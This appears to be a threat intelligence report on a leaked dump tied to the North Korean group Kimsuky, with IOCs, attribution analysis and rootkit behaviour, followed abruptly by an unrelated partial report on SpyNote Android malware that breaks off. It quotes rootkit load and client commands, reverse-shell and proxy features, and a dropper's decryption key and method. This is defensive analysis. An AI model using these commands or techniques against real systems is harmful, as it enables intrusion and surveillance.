Contents:
Part I: Technical Analysis
Part II: Goals Analysis
Part III: Threat Intelligence Report

Executive Summary

A rare and revealing breach attributed to a North Korean-affiliated actor, known only as “Kim” as named by the hackers who dumped the data, has delivered a new insight into Kimsuky (APT43) tactics, techniques, and infrastructure. This actor's operational profile showcases credential-focused intrusions targeting South Korean and Taiwanese networks, with a blending of Chinese-language tooling, infrastructure, and possible logistical support. The “Kim” dump, which includes bash histories, phishing domains, OCR workflows, compiled stagers, and rootkit evidence, reflects a hybrid operation situated between DPRK attribution and Chinese resource utilization.

This report is broken down into three parts: 

• Technical Analysis of the dump materials
• Motivation and Goals of the APT actor (group)
• A CTI report compartment for analysts

While this leak only gives a partial idea of what the Kimusky/PRC activities have been, the material provides insight into the expansion of activities, nature of the actor(s), and goals they have in their penetration of the South Korean governmental systems that would benefit not only DPRK, but also PRC.

Without a doubt, there will be more coming out from this dump in the future, particularly if the burned assets have not been taken offline and access is still available, or if others have cloned those assets for further analysis. We may revisit this in the future if additional novel information comes to light.

Part I: Technical Analysis

The Leak at a Glance

The leaked dataset attributed to the “Kim” operator offers a uniquely operational perspective into North Korean-aligned cyber operations. Among the contents were terminal history files revealing active malware development efforts using NASM (Netwide Assembler), a choice consistent with low-level shellcode engineering typically reserved for custom loaders and injection tools. These logs were not static forensic artifacts but active command-line histories showing iterative compilation and cleanup processes, suggesting a hands-on attacker directly involved in tool assembly.

In parallel, the operator ran OCR (Optical Character Recognition) commands against sensitive Korean PDF documents related to public key infrastructure (PKI) standards and VPN deployments. These actions likely aimed to extract structured language or configurations for use in spoofing, credential forgery, or internal tool emulation.

Privileged Access Management (PAM) logs also surfaced in the dump, detailing a timeline of password changes and administrative account use. Many were tagged with the Korean string 변경완료 (“change complete”), and the logs included repeated references to elevated accounts such as oracle, svradmin, and app_adm01, indicating sustained access to critical systems.

The phishing infrastructure was extensive. Domain telemetry pointed to a network of malicious sites designed to mimic legitimate Korean government portals. Sites like nid-security[.]com were crafted to fool users into handing over credentials via advanced AiTM (Adversary-in-the-Middle) techniques.

Finally, network artifacts within the dump showed targeted reconnaissance of Taiwanese government and academic institutions. Specific IP addresses and .tw domain access, along with attempts to crawl .git repositories, reveal a deliberate focus on high-value administrative and developer targets.

Perhaps most concerning was the inclusion of a Linux rootkit using syscall hooking (khook) and stealth persistence via directories like /usr/lib64/tracker-fs. This highlights a capability for deep system compromise and covert command-and-control operations, far beyond phishing and data theft.

Artifacts recovered from the dump include:

• Terminal history files demonstrating malware compilation using NASM
  
• OCR commands parsing Korean PDF documents related to PKI and VPN infrastructure
  
• PAM logs reflecting password changes and credential lifecycle events
  
• Phishing infrastructure mimicking Korean government sites
  
• IP addresses indicating reconnaissance of Taiwanese government and research institutions
  
• Linux rootkit code using syscall hooking and covert channel deployment
  

Credential Theft Focus

The dump strongly emphasizes credential harvesting as a central operational goal. Key files such as 136백운규001_env.key (The presence of 136백운규001_env.key is a smoking gun indicator of stolen South Korean Government PKI material, as its structure (numeric ID + Korean name + .key) aligns uniquely with SK GPKI issuance practices and provides clear evidence of compromised, identity-tied state cryptographic keys.) This was discovered alongside plaintext passwords, that indicate clear evidence of active compromise of South Korea’s GPKI (Government Public Key Infrastructure). Possession of such certificates would allow for highly effective identity spoofing across government systems.

PAM logs further confirmed this focus, showing a pattern of administrative account rotation and password resets, all timestamped and labeled with success indicators (변경완료: Change Complete). The accounts affected were not low-privilege; instead, usernames like oracle, svradmin, and app_adm01, often used by IT staff and infrastructure services, suggested access to core backend environments.

These findings point to a strategy centered on capturing and maintaining access to privileged credentials and digital certificates, effectively allowing the attacker to act as an insider within trusted systems.

• Leaked .key files (e.g., 136백운규001_env.key) with plaintext passwords confirm access to GPKI systems
  
• PAM logs show administrative password rotations tagged with 변경완료 (change complete)
  
• Admin-level accounts such as oracle, svradmin, and app_adm01 repeatedly appear in compromised logs
  

Phishing Infrastructure

The operator’s phishing infrastructure was both expansive and regionally tailored. Domains such as nid-security[.]com and webcloud-notice[.]com mimicked Korean identity and document delivery services, likely designed to intercept user logins or deploy malicious payloads. More sophisticated spoofing was seen in sites that emulated official government agencies like dcc.mil[.]kr, spo.go[.]kr, and mofa.go[.]kr.

Burner email usage added another layer of operational tradecraft. The address jeder97271[@]wuzak[.]com is likely linked to phishing kits that operated through TLS proxies, capturing credentials in real time as victims interacted with spoofed login forms.

These tactics align with previously known Kimsuky behaviors but also demonstrate an evolution in technical implementation, particularly the use of AiTM interception rather than relying solely on credential-harvesting documents.

• Domains include: nid-security[.]com, html-load[.]com, webcloud-notice[.]com, koala-app[.]com, and wuzak[.]com
  
• Mimicked portals: dcc.mil[.]kr, spo.go[.]kr, mofa.go[.]kr
  
• Burner email evidence: jeder97271[@]wuzak[.]com
  
• Phishing kits leveraged TLS proxies for AiTM credential capture
  

Malware Development Activity

Kim’s malware development environment showcased a highly manual, tailored approach. Shellcode was compiled using NASM, specifically with flags like -f win32, revealing a focus on targeting Windows environments. Commands such as make and rm were used to automate and sanitize builds, while hashed API call resolution (VirtualAlloc, HttpSendRequestA, etc.) was implemented to evade antivirus heuristics.

The dump also revealed reliance on GitHub repositories known for offensive tooling. TitanLdr, minbeacon, Blacklotus, and CobaltStrike-Auto-Keystore were all cloned or referenced in command logs. This hybrid use of public frameworks for private malware assembly is consistent with modern APT workflows.

A notable technical indicator was the use of the proxyres library to extract Windows proxy settings, particularly via functions like proxy_config_win_get_auto_config_url. This suggests an interest in hijacking or bypassing network-level security controls within enterprise environments.

• Manual shellcode compilation via nasm -f win32 source/asm/x86/start.asm
  
• Use of make, rm, and hash obfuscation of Win32 API calls (e.g., VirtualAlloc, HttpSendRequestA)
  
• GitHub tools in use: TitanLdr, minbeacon, Blacklotus, CobaltStrike-Auto-Keystore
  
• Proxy configuration probing through proxyres library (proxy_config_win_get_auto_config_url)

Rootkit Toolkit and Implant Structure

The Kim dump offers deep insight into a stealthy and modular Linux rootkit attributed to the operator’s post-compromise persistence tactics. The core implant, identified as vmmisc.ko (alternatively VMmisc.ko in some shells), was designed for kernel-mode deployment across multiple x86_64 Linux distributions and utilizes classic syscall hooking and covert channeling to maintain long-term undetected access.

Google Translation of Koh doc: Rootkit Endpoint Reuse Authentication Tool

“This tool uses kernel-level rootkit hiding technology, providing a high degree of stealth and penetration connection capability. It can hide while running on common Linux systems, and at the kernel layer supports connection forwarding, allowing reuse of external ports to connect to controlled hosts. Its communication behavior is hidden within normal traffic.

The tool uses binary merging technology: at compile time, the application layer program is encrypted and fused into a .ko driver file. When installed, only the .ko file exists. When the .ko driver starts, it will automatically decompress and release the hidden application-layer program.

Tools like chkrootkit, rkhunter, and management utilities (such as ps, netstat, etc.) are bypassed through technical evasion and hiding, making them unable to detect hidden networks, ports, processes, or file information.

To ensure software stability, all functions have also passed stress testing.

Supported systems: Linux Kernel 2.6.x / 3.x / 4.x, both x32 and x64 systems”.

Implant Features and Behavior

This rootkit exhibits several advanced features:

• Syscall Hooking: Hooks critical kernel functions (e.g., getdents, read, write) to hide files, directories, and processes by name or PID.
• SOCKS5 Proxy: Integrated remote networking capability using dynamic port forwarding and chained routing.
• PTY Backdoor Shell: Spawns pseudoterminals that operate as interactive reverse shells with password protection.
• Encrypted Sessions: Session commands must match a pre-set passphrase (e.g., testtest) to activate rootkit control mode.

Once installed (typically using insmod vmmisc.ko), the rootkit listens silently and allows manipulation via an associated client binary found in the dump. The client supports an extensive set of interactive commands, including:

+p              # list hidden processes

+f              # list hidden files

callrk          # load client ↔ kernel handshake

exitrk          # gracefully unload implant

shell           # spawn reverse shell

socks5          # initiate proxy channel

upload / download # file transfer interface

These capabilities align closely with known DPRK malware behaviors, particularly from the Kimsuky and Lazarus groups, who have historically leveraged rootkits for lateral movement, stealth, persistence, and exfiltration staging.

Observed Deployment

Terminal history (.bash_history) shows the implant was staged and tested from the following paths:

.cache/vmware/drag_and_drop/VMmisc.ko

/usr/lib64/tracker-fs/vmmisc.ko

Execution logs show the use of commands such as:

insmod /usr/lib64/tracker-fs/vmmisc.ko

./client 192.168.0[.]39 testtest

These paths were not random—they mimic legitimate system service locations to avoid detection by file integrity monitoring (FIM) tools.

This structure highlights the modular, command-activated nature of the implant and its ability to serve multiple post-exploitation roles while maintaining stealth through kernel-layer masking.

Strategic Implications

The presence of such an advanced toolkit in the “Kim” dump strongly suggests the actor had persistent access to Linux server environments, likely via credential compromise. The use of kernel-mode implants also indicates long-term intent and trust-based privilege escalation. The implant's pathing, language patterns, and tactics (e.g., use of /tracker-fs/, use of test passwords) match TTPs previously observed in operations attributed to Kimsuky, enhancing confidence in North Korean origin.

OCR-Based Recon

A defining component of Kim’s tradecraft was the use of OCR to analyze Korean-language security documentation. The attacker issued commands such as ocrmypdf -l kor+eng "file.pdf" to parse documents like 별지2)행정전자서명_기술요건_141125.pdf (“Appendix 2: Administrative Electronic Signature_Technical Requirements_141125.pdf”) and SecuwaySSL U_카달로그.pdf (“SecuwaySSL U_Catalog.pdf”). These files contain technical language around digital signatures, SSL implementations, and identity verification standards used in South Korea’s PKI infrastructure.

This OCR-based collection approach indicates more than passive intelligence gathering - it reflects a deliberate effort to model and potentially clone government-grade authentication systems. The use of bilingual OCR (Korean + English) further confirms the operator’s intention to extract usable configuration data across documentation types.

• OCR commands used to extract Korean PKI policy language from PDFs such as (별지2)행정전자서명_기술요건_141125.pdf and SecuwaySSL U_카달로그.pdf
  • 별지2)행정전자서명_기술요건_141125.pdf → (Appendix 2: Administrative Electronic Signature_Technical Requirements_141125.pdf
  • SecuwaySSL U_카달로그.pdf → SecuwaySSL U_Catalog.pdf
    
• Command examples: ocrmypdf -l kor+eng "file.pdf"
  

SSH and Log-Based Evidence

The forensic evidence contained within the logs, specifically SSH authentication records and PAM outputs, provides clear technical confirmation of the operator’s tactics and target focus.

Several IP addresses stood out as sources of brute-force login attempts. These include 23.95.213[.]210 (a known VPS provider used in past credential-stuffing campaigns), 218.92.0[.]210 (allocated to a Chinese ISP), and 122.114.233[.]77 (Henan Mobile, China). These IPs were recorded during multiple failed login events, strongly suggesting automated password attacks against exposed SSH services. Their geographic distribution and known history in malicious infrastructure usage point to an external staging environment, possibly used for pivoting into Korean and Taiwanese systems.

Beyond brute force, the logs also contain evidence of authentication infrastructure reconnaissance. Multiple PAM and OCSP (Online Certificate Status Protocol) errors referenced South Korea’s national PKI authority, including domains like gva.gpki.go[.]kr and ivs.gpki.go[.]kr. These errors appear during scripted or automated access attempts, indicating a potential strategy of credential replay or certificate misuse against GPKI endpoints, an approach that aligns with Kim’s broader PKI-targeting operations.

Perhaps the most revealing detail was the presence of successful superuser logins labeled with the Korean term 최고 관리자 (“Super Administrator”). This suggests the actor was not just harvesting credentials but successfully leveraging them for privileged access, possibly through cracked accounts, reused credentials, or insider-sourced passwords. The presence of such accounts in conjunction with password rotation entries marked as 변경완료 (“change complete”) further implies active control over PAM-protected systems during the operational window captured in the dump.

Together, these logs demonstrate a methodical campaign combining external brute-force access, PKI service probing, and administrative credential takeover, a sequence tailored for persistent infiltration and lateral movement within sensitive government and enterprise networks.

• Brute-force IPs: 23.95.213[.]210, 218.92.0[.]210, 122.114.233[.]77

• PAM/OCSP errors targeting gva.gpki.go[.]kr, ivs.gpki.go[.]kr
  
• Superuser login events under 최고 관리자 (Super Administrator)

Part II: Goals Analysis

Targeting South Korea: Identity, Infrastructure, and Credential Theft

The “Kim” operator’s campaign against South Korea was deliberate and strategic, aiming to infiltrate the nation’s digital trust infrastructure at multiple levels. A central focus was the Government Public Key Infrastructure (GPKI), where the attacker exfiltrated certificate files, including .key and .crt formats, some with plaintext passwords, and attempted repeated authentication against domains like gva.gpki.go[.]kr and ivs.gpki.go[.]kr. OCR tools were used to parse Korean technical documents detailing PKI and VPN architectures, demonstrating a sophisticated effort to understand and potentially subvert national identity frameworks. These efforts were not limited to reconnaissance; administrative password changes were logged, and phishing kits targeted military and diplomatic webmail, including clones of mofa.go[.]kr and credential harvesting through adversary-in-the-middle (AiTM) proxy setups.

Beyond authentication systems, Kim targeted privileged accounts (oracle, unwadm, svradmin) and rotated credentials to maintain persistent administrative access, as evidenced by PAM and SSH logs showing elevated user activity under the title 최고 관리자 (“Super Administrator”). The actor also showed interest in bypassing VPN controls, parsing SecuwaySSL configurations for exploitation potential, and deployed custom Linux rootkits using syscall hooking to establish covert persistence on compromised machines. Taken together, the dump reveals a threat actor deeply invested in credential dominance, policy reconnaissance, and system-level infiltration, placing South Korea’s public sector identity systems, administrative infrastructure, and secure communications at the core of its long-term espionage objectives.

Taiwan Reconnaissance

Among the most notable aspects of the “Kim” leak is the operator’s deliberate focus on Taiwanese infrastructure. The attacker accessed a number of domains with clear affiliations to the island’s public and private sectors, including tw.systexcloud[.]com (linked to enterprise cloud solutions), mlogin.mdfapps[.]com (a mobile authentication or enterprise login portal), and the .git/ directory of caa.org[.]tw, which belongs to the Chinese Institute of Aeronautics, a government-adjacent research entity.

This last domain is especially telling. Accessing .git/ paths directly implies an attempt to enumerate internal source code repositories, a tactic often used to discover hardcoded secrets, API keys, deployment scripts, or developer credentials inadvertently exposed via misconfigured web servers. This behavior points to  more technical depth than simple phishing; it indicates supply chain reconnaissance and long-term infiltration planning.

The associated IP addresses further reinforce this conclusion. All three, 163.29.3[.]119, 118.163.30[.]45, and 59.125.159[.]81, are registered to academic, government, or research backbone providers in Taiwan. These are not random scans; they reflect targeted probing of strategic digital assets.

Summary of Whois & Ownership Insights

• 118.163.30[.]45
  • Appears as part of the IP range used for the domain dtc-tpe.com[.]tw, linked to Taiwan’s HINET provider (118.163.30[.]46 )Site Indices page of HINET provider.
• 163.29.3[.]119
  • Falls within the 163.29.3[.]0/24 subnet identified with Taiwanese government or institutional use, notably in Taipei. This corresponds to B‑class subnets assigned to public/government entities IP地址 (繁體中文).
• 59.125.159[.]81
  
  • Belongs to the broader 59.125.159[.]0–59.125.159[.]254 block, commonly used by Taiwanese ISP operators such as Chunghwa Telecom in Taipei

Taken together, this Taiwan-focused activity reveals an expanded operational mandate. Whether the attacker is purely DPRK-aligned or operating within a DPRK–PRC fusion cell, the intent is clear: compromise administrative and developer infrastructure in Taiwan, likely in preparation for broader credential theft, espionage, or disruption campaigns.

• Targeted domains: tw.systexcloud[.]com, caa.org[.]tw/.git/, mlogin.mdfapps[.]com
  
• IPs linked to Taiwanese academic/government assets: 163.29.3[.]119, 118.163.30[.]45, 59.125.159[.]81
  
• Git crawling suggests interest in developer secrets or exposed tokens
  

Hybrid Attribution Model

The “Kim” operator embodies the growing complexity of modern nation-state attribution, where cyber activities often blur traditional boundaries and merge capabilities across geopolitical spheres. This case reveals strong indicators of both North Korean origin and Chinese operational entanglement, presenting a textbook example of a hybrid APT model.

On one hand, the technical and linguistic evidence strongly supports a DPRK-native operator. Terminal environments, OCR parsing routines, and system artifacts consistently leverage Korean language and character sets. The operator’s activities reflect a deep understanding of Korean PKI systems, with targeted extraction of GPKI .key files and automation to parse sensitive Korean government PDF documentation. These are hallmarks of Kimsuky/APT43 operations, known for credential-focused espionage against South Korean institutions and diplomatic targets. The intent to infiltrate identity infrastructure is consistent with North Korea’s historical targeting priorities. Notably, the system time zone on Kim's host machine was set to UTC+9 (Pyongyang Standard Time), reinforcing the theory that the actor maintains direct ties to the DPRK’s internal environment, even if operating remotely.

However, this actor’s digital footprint extends well into Chinese infrastructure. Browser and download logs reveal frequent interaction with platforms like gitee[.]com, baidu[.]com, and zhihu[.]com, highly popular within the PRC but unusual for DPRK operators who typically minimize exposure to foreign services. Moreover, session logs include simplified Chinese content and PRC browsing behaviors, suggesting that the actor may be physically operating within China or through Chinese-language systems. This aligns with longstanding intelligence on North Korean cyber operators stationed in Chinese border cities such as Shenyang and Dandong, where DPRK nationals often conduct cyber operations with tacit approval or logistical consent from Chinese authorities. These locations provide higher-speed internet, relaxed oversight, and convenient geopolitical proximity.

The targeting of Taiwanese infrastructure further complicates attribution. Kimsuky has not historically prioritized Taiwan, yet in this case, the actor demonstrated direct reconnaissance of Taiwanese government and developer networks. While this overlaps with Chinese APT priorities, recent evidence from the “Kim” dump, including analysis of phishing kits and credential theft workflows, suggests this activity was likely performed by a DPRK actor exploring broader regional interests, possibly in alignment with Chinese strategic goals. Researchers have noted that Kimsuky operators have recently asked questions in phishing lures related to potential Chinese-Taiwanese conflicts, implying interest beyond the Korean peninsula.

Some tooling overlaps with PRC-linked APTs, particularly GitHub-based stagers and proxy-resolving modules, but these are not uncommon in the open-source malware ecosystem and may reflect opportunistic reuse rather than deliberate mimicry.

IMINT Analysis: Visual Tradecraft and Cultural Camouflage

A review of image artifacts linked to the "Kim" actor reveals a deliberate and calculated use of Chinese social and technological visual content as part of their operational persona. These images, extracted from browser history and uploads attributed to the actor, demonstrate both strategic alignment with DPRK priorities and active cultural camouflage within the PRC digital ecosystem.

The visual set includes promotional graphics for Honor smartphones, SoC chipset evolution charts, Weibo posts featuring vehicle registration certificates, meme-based sarcasm, and lifestyle imagery typical of Chinese internet users. Notably, the content is exclusively rendered in simplified Chinese, reinforcing prior assessments that the operator either resides within mainland China or maintains a working digital identity embedded in Chinese platforms. Devices and services referenced, such as Xiaomi phones, Zhihu, Weibo, and Baidu, suggest intimate familiarity with PRC user environments.

Operationally, this behavior achieves two goals. First, it enables the actor to blend in seamlessly with native PRC user activity, which complicates attribution and helps bypass platform moderation or behavioral anomaly detection. Second, the content itself may serve as bait or credibility scaffolding (e.g. A framework to give the illusion of trust to allow for easier compromise ) in phishing and social engineering campaigns, especially those targeting developers or technical users on Chinese-language platforms.

Some images, such as the detailed chipset timelines and VPN or device certification posts, suggest a continued interest in supply chain reconnaissance and endpoint profiling—both tradecraft hallmarks of Kimsuky and similar APT units. Simultaneously, meme humor, sarcastic overlays, and visual metaphors (e.g., the “Kaiju’s tail is showing” idiom) indicate the actor’s fluency in PRC netizen culture and possible mockery of operational security breaches—whether their own or others’.

Taken together, this IMINT corpus supports the broader attribution model: a DPRK-origin operator embedded, physically or virtually, within the PRC, leveraging local infrastructure and social platforms to facilitate long-term campaigns against South Korea, Taiwan, and other regional targets while maintaining cultural and technical deniability.

Attribution Scenarios:

• Option A: DPRK Operator Embedded in PRC
  
  • Use of Korean language, OCR targeting of Korean documents, and focus on GPKI systems strongly suggest North Korean origin.
    
  • Use of PRC infrastructure (e.g., Baidu, Gitee) and simplified Chinese content implies the operator is physically located in China or benefits from access to Chinese internet infrastructure.
    
• Option B: PRC Operator Emulating DPRK
  
  • Taiwan-focused reconnaissance aligns with PRC cyber priorities.
    
  • Use of open-source tooling and phishing methods shared with PRC APTs could indicate tactical emulation.

The preponderance of evidence supports the hypothesis that “Kim” is a North Korean cyber operator embedded in China or collaborating with PRC infrastructure providers. This operational model allows the DPRK to amplify its reach, mask attribution, and adopt regional targeting strategies beyond South Korea, particularly toward Taiwan. As this hybrid model matures, it reflects the strategic adaptation of DPRK-aligned threat actors who exploit the permissive digital environment of Chinese networks to evade detection and expand their operational playbook.

Targeting Profiles

The “Kim” leak provides one of the clearest windows to date into the role-specific targeting preferences of the operator, revealing a deliberate focus on system administrators, credential issuers, and backend developers, particularly in South Korea and Taiwan.

In South Korea, the operator’s interest centers around PKI administrators and infrastructure engineers. The recovered OCR commands were used to extract technical details from PDF documents outlining Korea’s digital signature protocols, such as identity verification, certificate validation, and encrypted communications, components that form the backbone of Korea’s secure authentication systems. The goal appears to be not only credential theft but full understanding and potential replication of government-trusted PKI procedures. This level of targeting suggests a strategic intent to penetrate deeply trusted systems, potentially for use in later spoofing or identity masquerading operations.

In Taiwan, the operator shifted focus to developer infrastructure and cloud access portals. Specific domains accessed, like caa.org[.]tw/.git/, indicate attempts to enumerate internal repositories, most likely to discover hardcoded secrets, authentication tokens, or deployment keys. This is a classic supply chain targeting method, aiming to access downstream systems via compromised developer credentials or misconfigured services.

Additional activity pointed to interaction with cloud service login panels such as tw.systexcloud[.]com and mlogin.mdfapps[.]com. These suggest an attempt to breach centralized authentication systems or identity providers, granting the actor broader access into enterprise or government networks with a single credential set.

Taken together, these targeting profiles reflect a clear emphasis on identity providers, backend engineers, and those with access to system-level secrets. This reinforces the broader theme of the dump: persistent, credential-first intrusion strategies, augmented by reconnaissance of authentication standards, key management policies, and endpoint development infrastructure.

South Korean:

• PKI admins, infrastructure engineers
  
• OCR focus on Korean identity standards
  

Taiwanese:

• Developer endpoints and internal .git/ repos
  
• Access to cloud panels and login gateways
  

Final Assessment

The “Kim” leak represents one of the most comprehensive and technically intimate disclosures ever associated with Kimsuky (APT43) or its adjacent operators. It not only reaffirms known tactics, credential theft, phishing, and PKI compromise, but exposes the inner workings of the operator’s environment, tradecraft, and operational intent in ways rarely observed outside of active forensic investigations.

At the core of the leak is a technically competent actor, well-versed in low-level shellcode development, Linux-based persistence mechanisms, and certificate infrastructure abuse. Their use of NASM, API hashing, and rootkit deployment points to custom malware authorship. Furthermore, the presence of parsed government-issued Korean PDFs, combined with OCR automation, shows not just opportunistic data collection but a concerted effort to model, mimic, or break state-level identity systems, particularly South Korea's GPKI.

The operator’s cultural and linguistic fluency in Korean, and their targeting of administrative and privileged systems across South Korean institutions, support a high-confidence attribution to a DPRK-native threat actor. However, the extensive use of Chinese platforms like gitee[.]com, Baidu, and Zhihu, and Chinese infrastructure for both malware hosting and browsing activity reveals a geographical pivot or collaboration: a hybrid APT footprint rooted in DPRK tradecraft but operating from or with Chinese support.

Most notably, this leak uncovers a geographical expansion of operational interest; the actor is no longer solely focused on the Korean peninsula. The targeting of Taiwanese developer portals, government research IPs, and .git/ repositories shows a broadened agenda that likely maps to both espionage and supply chain infiltration priorities. This places Taiwan, like South Korea, at the forefront of North Korean cyber interest, whether for intelligence gathering, credential hijacking, or as staging points for more complex campaigns.

The threat uncovered here is not merely malware or phishing; it is an infrastructure-centric, credential-first APT campaign that blends highly manual operations (e.g., hand-compiled shellcode, direct OCR of sensitive PDFs) with modern deception tactics such as AiTM phishing and TLS proxy abuse.

Organizations in Taiwan and South Korea, particularly those managing identity, certificate, and cloud access infrastructure, should consider themselves under persistent, credential-focused surveillance. Defensive strategies must prioritize detection of behavioral anomalies (e.g., use of OCR tools, GPKI access attempts), outbound communications with spoofed Korean domains, and the appearance of low-level toolchains like NASM or proxyres-based scanning utilities within developer or admin environments.

In short: the “Kim” actor embodies the evolution of nation-state cyber threats—a fusion of old-school persistence, credential abuse, and modern multi-jurisdictional staging. The threat is long-term, embedded, and adaptive.

Part III: Threat Intelligence Report

TLP WHITE:

Targeting Summary

The analysis of the “Kim” operator dump reveals a highly focused credential-theft and infrastructure-access campaign targeting high-value assets in both South Korea and Taiwan. Victims were selected based on their proximity to trusted authentication systems, administrative control panels, and development environments.

‍

Indicators of Compromise (IOCs)

Domains

• Phishing: nid-security[.]com, html-load[.]com, wuzak[.]com, koala-app[.]com, webcloud-notice[.]com
• Spoofed portals: dcc.mil[.]kr, spo.go[.]kr, mofa.go[.]kr
• Pastebin raw links: Used for payload staging and malware delivery

IP Addresses

• External Targets (Taiwan):
  • 163.29.3[.]119     National Center for High-performance Computing
  • 118.163.30[.]45   Taiwanese government subnet
  • 59.125.159[.]81   Chunghwa Telecom
• Brute Forcing / Infrastructure Origins:
  • 23.95.213[.]210   VPS provider with malicious history
  • 218.92.0[.]210     China Unicom
  • 122.114.233[.]77  Henan Mobile, PRC

Internal Host IPs (Operator Environment)

• 192.168.130[.]117
• 192.168.150[.]117
• 192.168.0[.]39

Operator Environment: Internal Host IP Narrative

The presence of internal IP addresses such as 192.168.130[.]117, 192.168.150[.]117, and 192.168.0[.]39 within the dump offers valuable insight into the attacker’s local infrastructure, an often-overlooked element in threat intelligence analysis. These addresses fall within private, non-routable RFC1918 address space, commonly assigned by consumer off-the-shelf (COTS) routers and small office/home office (SOHO) network gear.

The use of the 192.168.0[.]0/16 subnet, particularly 192.168.0.x and 192.168.150.x, strongly suggests that the actor was operating from a residential or low-profile environment, not a formal nation-state facility or hardened infrastructure. This supports existing assessments that North Korean operators, particularly those affiliated with Kimsuky, often work remotely from locations in third countries such as China or Southeast Asia, where they can maintain inconspicuous, low-cost setups while accessing global infrastructure.

Moreover, the distinction between multiple internal subnets (130.x, 150.x, and 0.x) may indicate segmentation of test environments or multiple virtual machines running within a single NATed network. This aligns with the forensic evidence of iterative development and testing workflows seen in the .bash_history files, where malware stagers, rootkits, and API obfuscation utilities were compiled, cleaned, and rerun repeatedly.

Together, these IPs reveal an operator likely working from a clandestine, residential base of operations, with modest hardware and commercial-grade routers. This operational setup is consistent with known DPRK remote IT workers and cyber operators who avoid attribution by blending into civilian infrastructure. It also suggests the attacker may be physically located outside of North Korea, possibly embedded in a friendly or complicit environment, strengthening the case for China-based activity by DPRK nationals.

MITRE ATT&CK Mapping

‍

Tooling and Capabilities

The actor’s toolkit spans multiple disciplines, blending malware development, system reconnaissance, phishing, and proxy evasion:

• NASM-based shellcode loaders: Compiled manually for Windows execution.
• Win32 API hashing: Obfuscated imports via hashstring.py to evade detection.
• GitHub/Gitee abuse: Tooling hosted or cloned from public developer platforms.
• OCR exploitation: Used ocrmypdf to parse Korean PDF specs related to digital certificates and VPN appliances.
• Rootkit deployment: Hidden persistence paths including /usr/lib64/tracker-fs and /proc/acpi/pcicard.
• Proxy config extraction: Investigated PAC URLs using proxyres-based recon.

Attribution Confidence Assessment

Assessment: The actor appears to be a DPRK-based APT operator working from within or in partnership with Chinese infrastructure, representing a hybrid attribution model.

Defensive Recommendations

APPENDIX A

Overlap or Confusion with Chinese Threat Actors

There is notable evidence of operational blur between Kimsuky and Chinese APTs in the context of Taiwan. The 2025 “Kim” data breach revealed an attacker targeting Taiwan whose tools and phishing kits matched Kimsuky’s, yet whose personal indicators (language, browsing habits) suggested a Chinese national. Researchers concluded this actor was likely a Chinese hacker either mimicking Kimsuky tactics or collaborating with them.. In fact, the leaked files on DDoS Secrets hint that Kimsuky has “openly cooperated with other Chinese APTs and shared their tools and techniques”. This overlap can cause attribution confusion - a Taiwan-focused operation might initially be blamed on China but could involve Kimsuky elements, or vice versa. So far, consensus is that North Korean and Chinese cyber operations remain separate, but cases like “Kim” show how a DPRK-aligned actor can operate against Taiwan using TTPs common to Chinese groups, muddying the waters of attribution.

File List from dump:

Master Evidence Inventory:

Deceptive websites are mimicking popular Android application install pages on the Google Play Store to lure victims into downloading AndroidOS SpyNote malware, a potent Android RAT used for surveillance, data exfiltration, and remote control. This report highlights the resurfacing of SpyNote activity by the same actor in the previous DTI report in April and provides additional information around the recent activity and changes in tactics since the prior report. Notably, the actor made minor changes in IP resolutions and added additional anti-analysis in the APK dropper in an attempt to protect the SpyNote payload from detection.

Details

SpyNote is a highly intrusive Android Remote Access Trojan (RAT) with extensive capabilities for surveillance, data exfiltration, and device manipulation. It can remotely control a device’s camera and microphone, manage phone calls, and execute commands. Of particular concern is its keylogging functionality, which targets application credentials and abuses Android’s Accessibility Services to steal two-factor authentication (2FA) codes. Beyond data theft, SpyNote can also perform on-device actions like displaying overlay attacks for clickjacking. If granted administrator privileges, it gains the power to remotely wipe data, lock the device, or install additional malicious applications, making it a formidable threat for espionage and cybercrime.

The pages shown below are static clones, using HTML and CSS copied from the actual Google Play Store to appear legitimate. Their primary purpose is to trick users into downloading and installing an Android application package (.apk file). The “Install” button triggers a JavaScript function to download an .apk file directly from the malicious website.

Delivery Domain Registration and Website Patterns

Registrar

• NameSilo, LLC
• XinNet Technology Corporation

IP ISP:

• Lightnode Limited
• Vultr Holdings LLC

SSL Issuer:

• R10
• R11

Nameserver

• dnsowl[.]com
• xincache[.]com

Server Type:

• nginx

Prominent IP Resolved:

• 154.90.58[.]26
• 199.247.6[.]61

Frequent HTML Code Inclusions

• https[:]//unpkg[.]com/current-device@0.10.2/umd/current-device.min.js
• “sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE”
• “PJKdyVFC5jlu_l8Wo_hirJkhs1cmitmn44fgpOc3zFc”

Malware Delivery Website Review

The download() function is the core of the page’s malicious functionality.

It creates a hidden iframe and sets its source to a JavaScript URI that triggers a navigation to Chrome.apk. This is a common technique to initiate a file download from the browser without the user leaving the current page.

Malware Execution

1. Initial Dropper Decrypts Payload: The first APK reads encrypted assets, generates a key from its manifest, and decrypts the second-stage SpyNote payload.

The malware employs a dynamic payload technique to conceal its primary functions, loading them from a separate file only after the application is installed and running. This is achieved using a code injection method known as DEX Element Injection. The malware uses reflection to access and modify the app’s core ClassLoader at runtime, inserting its own malicious code elements at the very beginning of the code lookup path. This forces the Android system to prioritize and execute the malicious code over the app’s legitimate code, enabling it to bypass static security analysis and hijack application functions to intercept data.

The AndroidManifest file is protected and contains details needed to retrieve the AES decryption key from the Chrome.apk. In this case, the package name “rogcysibz.wbnyvkrn.sstjjs” is needed to retrieve the 16-byte AES key “62646632363164386461323836333631”.

Chrome.apk (Dropper)
48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566e8

Classes.dex (SpyNote)
86e8d3716318e9bb63b86aebe185db5db6718cb3ddea7fbafefa8ebfb674b9e8

Decrypted 000 + 001 (SpyNote * its assets/base dex File containing its C2 configurations)
b81febd19a457e6814d7e28d68742ae25fc4cf6472289a481e262048e9d8eee4
703d62470d31866ccecb66f0083084c478e9e92916041216ec8d839afed0d0d6

Within the assets/base/ folder there are two files: 000 and 001. The dropper essentially works by joining the 000 and 001 files (combined_assets). It then decrypts the combined assets with the AES key before gzip decompresses it. The resulting file is the SpyNote APK, which it loads in. This happens once the user installs the dropper, runs it, and taps a prompt in the app’s load screen. The decrypted file is another APK that the dropper loads which contains the main SpyNote functionality and configuration details for the command-and-control server (C2).

2. SpyNote Payload Loads C2 Logic: The main SpyNote APK dynamically loads another DEX file from its own `assets/base` folder. This DEX file contains the actual C2 connection logic.

